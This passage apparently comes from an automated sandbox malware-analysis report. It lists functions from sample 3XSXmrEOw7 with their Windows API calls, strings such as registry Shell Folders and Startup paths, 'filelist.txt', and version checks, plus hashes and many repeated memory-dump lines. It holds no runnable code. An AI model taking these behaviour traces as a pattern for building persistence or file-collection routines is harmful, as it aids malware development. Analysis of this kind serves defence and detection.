                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CurrentHandleModuleThread
                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                                                                        • API String ID: 46939698-282957996
                                                                                                                        • Opcode ID: fa3fe8352348c15f00598b62091e80e0ddde9f8a27996319b7a897add45f9042
                                                                                                                        • Instruction ID: 8343617a602856c7a5069f3be63dd48b7f90f14781bef638d1b05418c87fafc1
                                                                                                                        • Opcode Fuzzy Hash: fa3fe8352348c15f00598b62091e80e0ddde9f8a27996319b7a897add45f9042
                                                                                                                        • Instruction Fuzzy Hash: D321B0706513609BC7B09FB6BC0592B3BE0EB427B9761093FE800C32A0EB789805DB5D
                                                                                                                        APIs
                                                                                                                        • RemoveDirectoryA.KERNEL32 ref: 00418F96
                                                                                                                        • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?), ref: 0041901D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryPathRemoveTemp
                                                                                                                        • String ID: %s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                        • API String ID: 1713547617-3190903220
                                                                                                                        • Opcode ID: fe41703e54320f95e6681c1eb24154ae3abf6755114a66f0cff30b271b00e26e
                                                                                                                        • Instruction ID: 9d8b5efe2bea3eca9e416bc16e4a7f17c4f3e66b95ae640699afb986d6dc11f0
                                                                                                                        • Opcode Fuzzy Hash: fe41703e54320f95e6681c1eb24154ae3abf6755114a66f0cff30b271b00e26e
                                                                                                                        • Instruction Fuzzy Hash: B8715B710083869FC331DB20D8A4BE7B7E9AFD9308F04495EE5C987241EB39964DC74A
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID: Microsoft Win32s$Unknown$Windows 2000$Windows 95$Windows 98$Windows ME$Windows NT$Windows XP
                                                                                                                        • API String ID: 1889659487-1287414207
                                                                                                                        • Opcode ID: 454356975ecda9a0999586d875334d146cb9ecda42628de8b5ed3d6ee45c621a
                                                                                                                        • Instruction ID: 975d6d164ef17e93e1c34ab1fc7ce7197d2ce6e84d94eff38267c9a8d95a5eee
                                                                                                                        • Opcode Fuzzy Hash: 454356975ecda9a0999586d875334d146cb9ecda42628de8b5ed3d6ee45c621a
                                                                                                                        • Instruction Fuzzy Hash: B3510EFC9063428BC369CF18FC509997BE5EB9A316B05467ED86883372D7309484CB5E
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0043649A
                                                                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004364D2
                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004364DA
                                                                                                                          • Part of subcall function 00438DD6: UnhookWindowsHookEx.USER32(?), ref: 00438DFB
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004364EC
                                                                                                                        • GetDesktopWindow.USER32 ref: 00436519
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00436527
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00436536
                                                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 004365C5
                                                                                                                        • GetActiveWindow.USER32 ref: 004365D0
                                                                                                                        • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004365DE
                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004365FA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 833315621-0
                                                                                                                        • Opcode ID: e199c737b50d517b0b306a191cb206ffac98a79345493696f53003073e33933f
                                                                                                                        • Instruction ID: f6843848d02d9acbe4f9de89053a38c821629bc9e9d675896fa0d8a5ac17685f
                                                                                                                        • Opcode Fuzzy Hash: e199c737b50d517b0b306a191cb206ffac98a79345493696f53003073e33933f
                                                                                                                        • Instruction Fuzzy Hash: C741D030900706FFCF21AFA5E84976EBBB5BF09715F11403EF501A22A1CB785A41CA5E
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(0040476A), ref: 00413C4F
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Programs,00000000,?,0045DF18,?), ref: 00413C6F
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00413C76
                                                                                                                        • _strrchr.LIBCMT ref: 00413D9B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue_strrchr
                                                                                                                        • String ID: Desktop$Programs$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Startup$\
                                                                                                                        • API String ID: 2924401097-2691228934
                                                                                                                        • Opcode ID: 0451721ad7b7bfeab725ab4e83a88f08b5d70f3a35907e647927684d4f7ca702
                                                                                                                        • Instruction ID: 758c6f36c939e7f1c2052588e335acff266e04ba565fef884f1b9ab40d81982e
                                                                                                                        • Opcode Fuzzy Hash: 0451721ad7b7bfeab725ab4e83a88f08b5d70f3a35907e647927684d4f7ca702
                                                                                                                        • Instruction Fuzzy Hash: 5B511730208341AEE314CF25DC51FEB7BD45F95B06F14484DF9C497282EAB8E648C76A
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 004431B7
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,0047EB48,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 00443208
                                                                                                                        • GlobalHandle.KERNEL32(?), ref: 00443211
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0044321B
                                                                                                                        • GlobalReAlloc.KERNEL32(?,0047EB48,00002002), ref: 0044322F
                                                                                                                        • GlobalHandle.KERNEL32(?), ref: 00443241
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00443248
                                                                                                                        • LeaveCriticalSection.KERNEL32(0047EB28,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 00443251
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0044325D
                                                                                                                        • LeaveCriticalSection.KERNEL32(0047EB28), ref: 004432A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2667261700-0
                                                                                                                        • Opcode ID: 3551d93637448cf2e120c907dbe145befb04d6cacd3523446f38783358951b8d
                                                                                                                        • Instruction ID: b0708ac090b4c07532e2f73ad039cb67d6ce4f3aec897b0794ea91f6c69e5c79
                                                                                                                        • Opcode Fuzzy Hash: 3551d93637448cf2e120c907dbe145befb04d6cacd3523446f38783358951b8d
                                                                                                                        • Instruction Fuzzy Hash: 0A31AB74600704AFEB20CF74CC48A5ABBF9FF86746B014A6EE852C3620DB75EA00CB54
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00437855
                                                                                                                        • GetClassInfoA.USER32(?,?,?), ref: 00437870
                                                                                                                        • RegisterClassA.USER32(?), ref: 00437883
                                                                                                                        • lstrlenA.KERNEL32(-00000034,00000001), ref: 004378BF
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004378C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Classlstrlen$H_prologInfoRegister
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3690589370-0
                                                                                                                        • Opcode ID: b7666c6804b7a4e1af4ad46b385648ce39fa1e020673036b6e24608731eaa827
                                                                                                                        • Instruction ID: d06448f70216e37ad6dd6e7a27fae02cd191811b199e5e129bd5a26421677b7e
                                                                                                                        • Opcode Fuzzy Hash: b7666c6804b7a4e1af4ad46b385648ce39fa1e020673036b6e24608731eaa827
                                                                                                                        • Instruction Fuzzy Hash: 2431F7B1904109FFDF11AFA0CD05BAEBFB4FF09315F004126F845A2251C7389A11DB99
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0043628D
                                                                                                                        • GetSystemMetrics.USER32(0000002A), ref: 00436351
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004363BC
                                                                                                                        • CreateDialogIndirectParamA.USER32(?,?,?,00435D22,00000000), ref: 004363EB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                                        • String ID: MS Shell Dlg
                                                                                                                        • API String ID: 2364537584-76309092
                                                                                                                        • Opcode ID: 99dbcdcf67a2fa19b37189b7afad9b74a6c17b04bf948d761a6e24d7af02056e
                                                                                                                        • Instruction ID: 760bf385a5f842c8bc42ff6da57cfb0a7f61815e02265039a4cce4437fa5ada3
                                                                                                                        • Opcode Fuzzy Hash: 99dbcdcf67a2fa19b37189b7afad9b74a6c17b04bf948d761a6e24d7af02056e
                                                                                                                        • Instruction Fuzzy Hash: 4951C230D00206AFCF10EFA4C8859EEBBB5EF49314F15966EF812E7291D7388944CB99
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040C539
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,00000000,00000000), ref: 0040C595
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
